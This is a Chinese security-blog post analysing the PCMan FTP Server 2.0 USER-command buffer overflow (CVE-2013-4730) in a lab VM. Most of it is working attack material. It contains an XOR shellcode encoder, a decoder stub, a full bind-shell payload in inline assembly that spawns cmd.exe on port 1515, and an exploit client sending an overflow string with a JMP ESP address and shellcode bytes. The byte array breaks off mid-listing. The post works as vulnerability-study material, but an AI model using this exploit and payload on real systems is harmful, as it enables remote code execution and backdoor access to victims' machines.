[原创]小白分析PCManFTP漏洞 CVE-2013-4730
2020-11-26 19:23 6573
软件名称:PCManFTP 软件版本:2.0 漏洞模块:PCManFTPD2.exe 模块版本:2.0.0.0 编译日期:2020-11-24 | 操作系统:Windows 7 专业版(32位) 漏洞编号:CVE-2013-4730 危害等级:高危 漏洞类型:缓冲区溢出 威胁类型:远程 |
1.软件简介
PCMan's FTP Server是洪任谕先生所研发的一套FTP服务器软件。
FTP(File Transfer Protocol,文件传输协议) 是 TCP/IP 协议组中的协议之一。FTP协议包括两个组成部分,其一为FTP服务器,其二为FTP客户端。其中FTP服务器用来存储文件,用户可以使用FTP客户端通过FTP协议访问位于FTP服务器上的资源。在开发网站的时候,通常利用FTP协议把网页或程序传到Web服务器上。此外,由于FTP传输效率非常高,在网络上传输大的文件时,一般也采用该协议。
默认情况下FTP协议使用TCP端口中的 20和21这两个端口,其中20用于传输数据,21用于传输控制信息。但是,是否使用20作为传输数据的端口与FTP使用的传输模式有关,如果采用主动模式,那么数据传输端口就是20;如果采用被动模式,则具体最终使用哪个端口要服务器端和客户端协商决定。
FTP协议常用指令 | 功能说明 |
USER <username> PASS <password> CWD <dir path> RETR <filename> RMD <directory> RNTO <new path> HELP <command> | 用户名 密码 改变服务器上的工作目录 在服务器上删除指定目录 从服务器上找回(复制)文件 对新路径重命名 返回指定命令信息 |
2.漏洞成因
PCMan's FTP Server 2.0版本中存在缓冲区溢出漏洞。远程攻击者可借助USER命令中的长字符串利用该漏洞执行任意代码。在recv函数上下断点持续跟踪,发现服务端在接收到登录请求之后,会将收到的信息进行字符串拼接,而在字符串拼接的地方,并未进行长度控制,因此导致缓冲区溢出:sprintf 对写入buffer的字符数没有任何限制,这就存在了buffer溢出的可能性。解决这个问题,可以考虑使用 snprintf函数,该函数可按传入的缓冲区大小对写入字符数做出限制(需传入真实的缓冲区大小,并检查返回值以发现截断)。
3.利用过程
3.1准备工作
1)自动生成有序数,并能确定异常点的偏移(可以使用windbg插件Mona2)
2)Mona2环境需要Python 2.7
3)Windbg(用来定位JMP ESP地址)
4)OllyDbg(为了后续测试)
5)Visual Studio2019写测试代码和ShellCode
3.2配置环境
1)虚拟机win7专业版sp1
2)安装WDK,它自带WinDBG
3)安装Python2.7.2
4)安装Visual C++ 2008运行库
5)安装WinDbg的Python插件Pykd
6)复制mona.py和windbglib.py到WinDbg同目录
7)运行WinDbg随便调试一个程序进行测试以上环境
.load pykd.pyd加载pykd
!py mona 测试Mona
.reload /f加载windbg符号
3.3软件测试
FTP需要符合标准:RFC959
1)建立Socket连接,连接目标FTP
2)连接FTP服务器的欢迎语
3)发送”USER XXX”到FTP
4)接受请求结果
5)详细代码在后文exploit(poc中4))
3.4手动Fuzz测试
构建长字符串进行测试,使用mona生成有序长字符串!Py mona pc 3000,替换掉”+++Haha+++”,再测试,发现测试代码在等待服务器信息处不能退出,虚拟机中的程序已经崩溃
观察windbg中的信息,得到异常信息并查找到异常处在字符串中的位置
得到偏移后,在系统中查找一个JMP ESP作为跳板
用当前指令(!py mona jmp r esp)得到的地址不能作为跳板,因为如果转成字符串, 会有00出现,使用指定模块查找方法
3.5 Shellcode组合逻辑
第一部分:”USER ”(注意有空格)
第二部分:无意义的字符串,长度为2001个字节
第三部分:JMP ESP
第四部分:解密代码+Payload,位于ESP指向的地址,与JMP ESP指令相差4个字节
Payload 在读取时被0x00字符截断了,对Payload 进行异或加密,并在开头加上解密代码的十六进制数
3.6 Payload(BindShell)
BindShell原理:将一个cmd控制台的标准输入输出句柄定向至一个网络端口,那么本地的cmd控制台不会接受本地的命令输入,同样本地也不会看到命令执行的回显,此时连接本地网络端口的远程程序获得了此cmd控制台的所有权限,可以像在本地一样直接控制被连接的机器
本文中首先发送shellcode给ftp,这时候创建socket,绑定的端口是21,payload中也会创建socket,它绑定的端口是1515,所以当发送shellcode之后,主机连接对方时cmd命令是 telnet加上ip再加上1515
4.POC
1)实现加密功能的代码
#include "stdio.h"
#include "windows.h"

// Try each single-byte XOR key from 0x00 to 0xFF until one is found for which
// no encoded byte of pData[0..nSize) is 0x00, 0x0A, 0x0D or 0x20. The key and
// the encoded bytes are then written to "Encode.txt" as a C char-array literal.
// Returns true on success; false if no key qualifies or the file cannot be opened.
// NOTE(review): pBuffer is leaked on both early-return paths below; only the
// success path deletes it.
bool AutoEnCoder( char* pData, int nSize )
{
    // 1. Try different keys until the encoded output contains none of the excluded bytes.
    int nOutKey = 0x00;
    unsigned char* pBuffer = nullptr;
    bool bComplete = true;
    pBuffer = ( unsigned char* )new char[ nSize + 1 ];
    for ( int key = 0; key <= 0xFF; key++) {
        nOutKey = key;
        bComplete = true;
        for ( int i = 0; i < nSize; i++ ) {
            pBuffer[ i ] = pData[ i ] ^ key;
            if ( 0x00 == pBuffer[i] || 0x0A == pBuffer[i] || 0x0D == pBuffer[i] || 0x20 == pBuffer[i]) {
                // An excluded byte appeared: abandon this key and try the next one.
                bComplete = false;
                break;
            }
        }
        if (bComplete) {
            // Every byte passed the check with this key, so encoding is done.
            break;
        }
    }
    if ( !bComplete ) {
        // No key worked: skip the output step. (pBuffer is not freed here.)
        return false;
    }
    // Save the key and the encoded text.
    FILE* fpOutFile;
    if ( EINVAL == fopen_s(&fpOutFile,"Encode.txt","w+") ) {
        // Robustness check. NOTE(review): fopen_s reports other errno values as
        // well; comparing only against EINVAL lets those fall through to the
        // fprintf calls below with fpOutFile unset.
        return false;
    }
    // Emit '/* Encode Key = 0xXX */'.
    fprintf( fpOutFile, "/* Encode Key = 0x%.2x */\n", nOutKey );
    // Emit the encoded bytes as a char array, 16 bytes per line.
    fprintf( fpOutFile, "char ShellCode[] = \\\n" );
    for (int i = 0; i < nSize; i++ ) {
        fprintf( fpOutFile, "\\x%.2X", pBuffer[ i ] );
        if ((i+1)%16 == 0) {
            // Close the current string fragment and continue on the next line.
            // NOTE(review): only a closing quote is written here and no opening
            // quote is written anywhere, so the generated literal needs manual
            // fix-up before it compiles.
            fprintf( fpOutFile, "\"\\\n" );
        }
    }
    // Emit the final "; terminator.
    fprintf( fpOutFile, "\";" );
    // Done: close the file and release the buffer.
    fclose( fpOutFile );
    delete[]pBuffer;
    return true;
}

// Placeholder: the bytes to be encoded go here.
char cShellCode[] = "被加密代码的opecode写这里哟";

int main()
{
    // sizeof includes the terminating NUL, so that byte is encoded as well.
    AutoEnCoder(cShellCode,sizeof(cShellCode));
    return 0;
}
2)实现解密功能的代码
#include "stdio.h" #include "windows.h" int main() { _asm { xor eax, eax; // GetPC call tag_Get_PC - 1; tag_Get_PC: retn; pop eax; // Decode lea esi, [ eax + 0x1B ]; xor ecx, ecx; mov cx, 0x27b; tag_Decode: mov al, [ esi + ecx ]; xor al, 0x17; mov[ esi + ecx ], al; loop tag_Decode; xor[ esi + ecx ], 0x17; jmp esi; } return 0; }
3)Payload代码(bindshell)
#include<Windows.h> int main() { _asm { sub esp, 0x50; push ebp; mov ebp, esp; sub esp, 0x10; jmp tag_ShellCode; // 前置代码跳过数据区 // cmd.exe\0 25 _asm _emit(0x63) _asm _emit(0x6D) _asm _emit(0x64) _asm _emit(0x2E) _asm _emit(0x65) _asm _emit(0x78) _asm _emit(0x65) _asm _emit(0x00) // ws2_32.dll\0 1D _asm _emit(0x77) _asm _emit(0x73) _asm _emit(0x32) _asm _emit(0x5F) _asm _emit(0x33) _asm _emit(0x32) _asm _emit(0x2E) _asm _emit(0x64) _asm _emit(0x6C) _asm _emit(0x6C) _asm _emit(0x00) // kernel32.dll\0 12 _asm _emit(0x6B) _asm _emit(0x65) _asm _emit(0x72) _asm _emit(0x6E) _asm _emit(0x65) _asm _emit(0x6C) _asm _emit(0x33) _asm _emit(0x32) _asm _emit(0x2E) _asm _emit(0x64) _asm _emit(0x6C) _asm _emit(0x6C) _asm _emit(0x00); tag_ShellCode: // 1. GetPC call tag_Next; tag_Next: pop ebx; // 这里就得到了shellcode的地址 mov[ebp - 0x04], ebx; // EBP - 4 CodeBase; // 2. 获取关键地址:kernel32.dll地址 mov esi, fs:[0x30]; // PEB addr mov esi, [esi + 0x0c]; // PEB_LDR_DATA mov esi, [esi + 0x1c]; // 双向链表 mov esi, [esi]; // 取出下一个结构体地址 mov edx, [esi + 0x08]; // 获取Kernel32.dll地址 //mov[ ebp - 0x08 ], edx; // EBP - 8 KernelBaseAddr // 3. 查找 LoadLibraryExA地址 push edx; // KernelBaseAddr push 0xc0d83287; // 提前计算好的LoadLibraryExA字符的简易HASH call fun_GetFunAddrByHash; // 通过比较HASH查找 关键函数 mov edi, eax; // 4. 加载Kernel32.dll增加兼容性 lea esi, [ebx - 0x12]; // "Kernel32.dll"字符串地址 push 0; // dwFlag = 0 push 0; // hFile = 0 push esi; // lpLibFileName = "Kernel32.dll" call edi; // LoadLibraryExA(); mov[ebp - 0x08], eax; // 5. 加载WS2_32.dll以方便后边的网络通信编程 lea esi, [ebx - 0x1D]; // "ws2_32.dll"字符串地址 push 0; // dwFlag = 0 push 0; // hFile = 0 push esi; // lpLibFileName = "ws2_32.dll" call edi; // LoadLibraryExA(); mov[ebp - 0x0c], eax; // 6. 执行PayLoad部分 push[ebp - 0x0c]; // ws2_32.dll 地址 push[ebp - 0x08]; // Kernel32.dll addr push[ebp - 0x04]; // CodeBase addr call fun_PayLoad; // 7. 
PayLoad 执行完毕结束程序,防止被调试分析 push[ebp - 0x08]; // KernelBase push 0x4fd18963; // ExitProcess hash值 call fun_GetFunAddrByHash; push 0; // ExitCode = 0; call eax; // ExitProcess(0); mov esp, ebp; pop ebp; fun_GetFunAddrByHash: push ebp; mov ebp, esp; sub esp, 0x0c; push edx; // 1. 获取EAT,ENT,EOT地址: mov ecx, [ebp + 0x0c]; // ecx,参数1是 IMAGEBASE mov eax, [ecx + 0x3c]; // edx + 3c 是DOS头指向NT头的偏移 mov eax, [eax + ecx + 0x78]; // eax + edx 是NT头的地址 再 + 0x78 是数据目录表[0]的偏移 mov edi, [eax + ecx + 0x1c]; // EAT RVA add edi, ecx; mov[ebp - 0x04], edi; // EAT 保存到局部变量1中 mov edi, [eax + ecx + 0x20]; // ENT add edi, ecx; mov[ebp - 0x08], edi; // ENT 保存到局部变量2中 mov edi, [eax + ecx + 0x24]; // EOT add edi, ecx; mov[ebp - 0x0c], edi; // EOT 保存到局部变量3中 mov edi, [eax + ecx + 0x18]; // 导出表中 名称数量 // 2. 循环比较ENT中的函数名 xor ecx, ecx; jmp tag_FirstCmp; tag_CmpFunNameLoop: inc ecx; tag_FirstCmp: mov esi, [ebp - 0x08]; // ENT addr mov esi, [esi + ecx * 4]; // ENT RVA 当下一次比较时,指针 + 4 mov edx, [ebp + 0x0c]; // KernelBase lea esi, [edx + esi]; // 获取到具体函数名的指针 push[ebp + 0x08]; // 参数2:要进行对比的摘要 push esi; // 函数名指针 call fun_Hash_CmpString; // ecx = "GetProcAddress"长度 cmp eax, 1; // 如果对比函数返回1则说明找到这个函数了 jne tag_CmpFunNameLoop; // 不相等继续进行比较 mov esi, [ebp - 0x0c]; // 取出EOT xor edi, edi; mov di, [esi + ecx * 2]; // di是序号,函数名在ENT表中的下标与序号表中的序号是对应的;要在EOT中找到这个ECX对应的地方 // *2 是每个序号为WORD型,占两个字节,要偏移ECX * 2个字节 才是需要的数据 // 这个数据 用于在EAT中作为下标查找对应的地址; mov edx, [ebp - 0x04]; // 取出 EAT mov esi, [edx + edi * 4]; // esi = 用序号在函数地址数组找到函数名对应函数地址 mov edx, [ebp + 0x0c]; // edx = param_1 IMAGE_BASE // 返回获取到的关键函数地址 lea eax, [edx + esi]; // getprocaddress pop edx; mov esp, ebp; pop ebp; retn 0x08; fun_Hash_CmpString: push ebp; mov ebp, esp; sub esp, 0x04; // 开辟局部变量并清零 mov dword ptr[ebp - 0x04], 0x00; push ebx; // 保存用到的寄存器 push ecx; push edx; mov esi, [ebp + 0x08]; // strFunName xor ecx, ecx; xor eax, eax; tag_HashLoop: mov al, [esi + ecx]; // 字符串的第ecx字符 test al, al; // 判断是否为0。 jz tag_HashEnd; // 为0结束循环 mov ebx, [ebp - 0x04]; // 得到hash1 shl ebx, 
0x19; // hash1<< 25 mov edx, [ebp - 0x04]; // hash2>>7 shr edx, 0x07; or ebx, edx; // hash1 + hash2 add ebx, eax; // 添加下一个字符的ASCII mov[ebp - 0x04], ebx; inc ecx; // ecx++ jmp tag_HashLoop; tag_HashEnd: mov ebx, [ebp + 0x0c]; // 这里得到 函数名摘要 mov edx, [ebp - 0x04]; // 要进行对比的摘要 xor eax, eax; cmp ebx, edx; // 比较这两个摘要 jne tag_FunEnd; // 不相等就结束比较 mov eax, 1; // 相等返回1 tag_FunEnd: pop edx; pop ecx; pop ebx; mov esp, ebp; pop ebp; retn 0x08; fun_PayLoad: push ebp; mov ebp, esp; sub esp, 0x300; // 1. 初始化winsock服务 push[ebp + 0x10]; // kernelBase push 0x80b46a3d; // WSAStartup 摘要 call fun_GetFunAddrByHash; lea esi, [ebp - 0x300]; // WSADATA push esi; // LPWSAData = WSADATA push 0x0202; // wVersionRequested = 2.2 call eax; // WSAStartup() test eax, eax; // 函数返回结果 0 为执行成功 jnz tag_PayLoadEnd; // 2. 创建一个原始套接字 push[ebp + 0x10]; // kernelbase push 0xde78322d; // WSASocketA 摘要 call fun_GetFunAddrByHash; push 0; push 0; push 0; push 6; // protocol = IPPROTO_TCP push 1; // type = sock_STREAM push 2; // -af = AF_INET call eax; // WSASocketA() mov[ebp - 0x04], eax; // 得到的套接字给局部变量 // 3. 在任意地址上绑定一个端口1515; push[ebp + 0x10]; // kernelBase push 0xdda71064; // bind 摘要 call fun_GetFunAddrByHash; mov word ptr[ebp - 0x200], 0x02; // sockaddr_in.sin_family = AF_INET mov word ptr[ebp - 0x1fe], 0xeb05;// sockAddr_in.sin_port = 1515(0xEB05) htons(1515); mov dword ptr[ebp - 0x1fc], 0; // sockaddr_in.sin_addr = inaddr_any lea esi, [ebp - 0x200]; // esi = sockaddr_in push 0x14; // 结构体长度 push esi; // 结构体:SOCKADDR_IN push[ebp - 0x04]; // socket call eax; // bind(); test eax, eax; // 绑定成功返回0 jnz tag_PayLoadEnd; // 4. 监听端口的连接 push[ebp + 0x10]; push 0x4bd39f0c; call fun_GetFunAddrByHash; push 0x7fffffff; // backlong = SOMAXCONN push[ebp - 0x04]; // socket call eax; // listen() cmp eax, 0; //and eax, eax; // 成功返回0 jnz tag_PayLoadEnd; // 5. 
接受连接 push[ebp + 0x10]; push 0x01971eb1; call fun_GetFunAddrByHash; push 0; // 参数3:addrlen = null push 0; // 参数2:addr = null push[ebp - 0x04]; // 参数1:socket call eax; // accept() mov[ebp - 0x04], eax; // 返回结果到局部变量 // 6. 创建一个cmd进程 push[ebp + 0x0c]; // kernel32.dll base push 0x6ba6bcc9; call fun_GetFunAddrByHash; mov edx, eax; // CreateProcess() 地址 lea edi, [ebp - 0x90]; // 清空STARTUPINFOA mov ecx, 0x11; // STARTUPINFOA mov eax, 0x00; // 从EBP - 0x90开始 cld; // 到ebp-0x48结束 rep stosd; mov dword ptr[ebp - 0x90], 0x00000044; // cb = 68 mov dword ptr[ebp - 0x64], 0x00000101; // dwFlag = STARTF_USESTDHANDLES mov word ptr[ebp - 0x60], 0x0000; // wShowWindow = SW_HIDE mov esi, [ebp - 0x04]; // socket mov dword ptr[ebp - 0x58], esi; // Input = socket mov dword ptr[ebp - 0x54], esi; // Output = socket mov dword ptr[ebp - 0x50], esi; // Error = socket lea esi, [ebp - 0x90]; // STARTUPINFOA lea edi, [ebp - 0x200]; // PROCESS_INFORMATION 结构体 mov ebx, [ebp + 0x08]; // CodeBase lea ebx, [ebx - 0x25]; // "cmd.exe\0" push edi; push esi; push 0; push 0; push 0; push 1; push 0; push 0; push ebx; push 0; call edx; // CreateProcessA() tag_PayLoadEnd: mov esp, ebp; pop ebp; retn 0x0c; } return 0; }
4)Exploit代码,其中字符串pCompand是shellcode的opcode
#include <WinSock2.h> #include <windows.h> #pragma comment(lib,"Ws2_32.lib") int main() { // 1. 初始化SOCKET WSADATA stWSA; WSAStartup(0x0202, &stWSA); // 2. 创建原始套接字 SOCKET stListen = INVALID_SOCKET; stListen = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0); // 3. 在任意地址绑定一个端口21(INADDR_ANY) SOCKADDR_IN stService; stService.sin_addr.s_addr = inet_addr("192.168.161.132"); stService.sin_port = htons(21); stService.sin_family = AF_INET; connect(stListen, (SOCKADDR*)& stService, sizeof(stService)); // 4. 接受返回信息缓冲区 char szRecv[0x100] = { 0 }; // 5.登录请求 char pCompand[] = "\x55\x53\x45\x52\x20\x32\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ 
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ 
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ 
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ 
"\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30"\ "\x30\x30\x30\x30\x30\x30\xF7\xF7\x02\x76\x41\x41\x41\x41"\ "\x33\xC0" "\xE8\xFF\xFF\xFF\xFF"\ "\xC3"\ "\x58"\ "\x8D\x70\x1B" "\x33\xC9"\ 